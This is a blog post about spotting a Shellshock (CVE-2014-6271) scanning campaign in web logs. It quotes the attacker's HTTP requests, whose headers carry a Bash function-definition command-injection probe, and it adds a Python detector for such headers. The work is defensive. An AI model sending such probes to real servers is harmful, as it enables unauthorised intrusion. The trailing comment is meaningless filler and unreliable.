Attack of the Day

Thanks for the Heads Up

While cleaning out some junk logs and double-checking things for a different project I’m currently working on, I stumbled across this in the long list of thrown away traffic:

GET /Ringing.at.your.dorbell! HTTP/1.0
 Cache-Control: no-cache
 Connection: Keep-Alive
 Pragma: no-cache
 Cookie: Greetz to M, st0n3d, Jorgee, CoLdZeRo, and Tomato lol!
 Referer: http://google.com/search?q=2+guys+1+horse
 User-Agent: CVE-2014-6271 ;)
 Test: Still a lot of these at 2015! haha! 'tangina!
 X-Forwarded-For: 174.36.209.208

By itself, kind of funny for a number of reasons. I thought it was very kind of them to announce their presence AND give me 3 entire seconds of warning before aggressively hitting 861 additional URIs looking for a Shellshock-vulnerable page.

GET /siteUserMod.cgi HTTP/1.0
 Cache-Control: no-cache
 Connection: close
 Pragma: no-cache
 Cookie: () { goo;}; echo Content-Type: text/plain ; echo ; echo shellshot_`expr 1344 - 7`
 Referer: http://google.com/search?q=2+guys+1+horse
 User-Agent: () { goo;}; echo Content-Type: text/plain ; echo ; echo shellshot_`expr 1344 - 7`
 Test: () { goo;}; echo Content-Type: text/plain ; echo ; echo shellshot_`expr 1344 - 7`

I haven’t followed the referer, but my instincts tell me it won’t be pretty. Unless you’re into that sort of thing... I’m not judging. Hopefully st0n3d, Jorgee, CoLdZeRo and tomato will release some stats on their scripted adventure. Mad props or something. ‘tangina?
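
As an added example (not the author's code), one way to pick these probes out of logged traffic: flag any header whose value begins with the Bash function-definition prefix `() {`, and compute the canary string a vulnerable CGI would have sent back. The function names and the abridged sample log, constructed from the two requests quoted above, are assumptions.

```python
import re

# CVE-2014-6271 triggers when a header value exported to the CGI environment
# starts with a Bash function definition: "() {" (whitespace may vary).
FUNC_PREFIX = re.compile(r"^\s*\(\s*\)\s*\{")
# The probe echoes a canary built with `expr`, so the finished string only
# shows up in a response if the command actually ran.
CANARY = re.compile(r"echo\s+(\w+)`expr\s+(\d+)\s*-\s*(\d+)`")

# Constructed sample: the two requests from the post, abridged.
SAMPLE_LOG = """\
GET /Ringing.at.your.dorbell! HTTP/1.0
Cookie: Greetz to M, st0n3d, Jorgee, CoLdZeRo, and Tomato lol!
User-Agent: CVE-2014-6271 ;)

GET /siteUserMod.cgi HTTP/1.0
Cookie: () { goo;}; echo Content-Type: text/plain ; echo ; echo shellshot_`expr 1344 - 7`
User-Agent: () { goo;}; echo Content-Type: text/plain ; echo ; echo shellshot_`expr 1344 - 7`
Test: () { goo;}; echo Content-Type: text/plain ; echo ; echo shellshot_`expr 1344 - 7`
"""

def parse_requests(raw):
    """Split blank-line-separated requests into (request_line, headers)."""
    requests = []
    for block in re.split(r"\n\s*\n", raw.strip()):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        headers = []
        for ln in lines[1:]:
            name, sep, value = ln.partition(":")  # split on the first colon only
            if sep:
                headers.append((name.strip(), value.strip()))
        requests.append((lines[0], headers))
    return requests

def expected_marker(value):
    """Return the string a vulnerable host would echo, or None if no canary."""
    m = CANARY.search(value)
    return m.group(1) + str(int(m.group(2)) - int(m.group(3))) if m else None

def shellshock_findings(raw):
    """Map each request line to the header names carrying the function prefix."""
    findings = {}
    for request_line, headers in parse_requests(raw):
        hits = [name for name, value in headers if FUNC_PREFIX.match(value)]
        if hits:
            findings[request_line] = hits
    return findings
```

Searching stored response bodies for the value `expected_marker` returns shows whether any of the probed URIs executed the payload.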

2 thoughts on “Thanks for the Heads Up”

  1. Good point.. I was looking at it in terms of jkljkljkljlfji, but sdfdfsdf is an equally compelling idea.
